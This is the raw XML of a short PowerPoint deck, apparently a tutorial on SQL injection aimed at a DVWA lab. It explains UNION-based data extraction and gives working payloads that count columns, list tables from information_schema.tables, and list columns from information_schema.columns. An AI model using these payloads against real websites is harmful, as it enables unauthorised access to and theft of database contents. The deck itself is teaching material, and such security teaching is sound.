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SQLi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exfiltration and DB enumeration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D7ABD-4C64-4CE4-9273-3151E7E8D6C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9371012" y="5894457"/>
            <a:ext cx="264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sleepunderflow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Grzegorz Zielinski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615-B203-45FC-8AAB-5BA78B9F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91D5-D7F7-47AF-BD47-4311E6D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read data from a database we need  to know what table to read from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We are constrained to what the website developer shows us – can be just a single column (list of usernames only), can be 5 columns, can be 20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not every column read from database must be shown and not every column that you see must be originated from a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db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9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35DA-18E4-45A2-9C56-694C4701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683D-12B1-4C4D-8D47-7C65CD42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fact that if we see some data listed it probably uses SELECT statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT can use UNION command to show data from multiple tables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CONCAT function can be used to squeeze multiple columns into a single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135-32AF-4270-B273-0EC40B0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52400"/>
            <a:ext cx="10360501" cy="804669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enumerate number of columns read from a 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CB43-DD69-46A9-ACEC-B24AFBD2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160266"/>
            <a:ext cx="10360501" cy="660400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘ UNION ALL SELECT 1,2,3 --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90A32E-7F4C-4C42-8D70-10CE526F4C3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217612" y="1820669"/>
            <a:ext cx="10360501" cy="660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List Tables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CD39B-AB65-49D7-B113-07039E2B0CCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217612" y="2684266"/>
            <a:ext cx="10360501" cy="965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' UNION ALL SELECT table_name, table_schema FROM information_schema.tables --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2E337-AB72-42DF-A843-7F3D387B0D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217612" y="3649469"/>
            <a:ext cx="10360501" cy="660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Columns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6CBEF-FF0B-47E5-B676-A3D2DB93E2CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217612" y="4513066"/>
            <a:ext cx="10360501" cy="965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' UNION ALL SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ' ', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> --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937785-E371-4FEF-9B37-7F07B3C8479D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1217612" y="5512083"/>
            <a:ext cx="10360501" cy="96520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' UNION ALL SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, CONCAT(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, ' ', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ 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295</TotalTime>
  <Words>221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SQLi</vt:lpstr>
      <vt:lpstr>Why</vt:lpstr>
      <vt:lpstr>What do we use</vt:lpstr>
      <vt:lpstr>Enumerate number of columns read from a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</dc:title>
  <dc:creator>Grzegorz zieliński</dc:creator>
  <cp:lastModifiedBy>Grzegorz zieliński</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-23T14:23:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-23T19:18:56Z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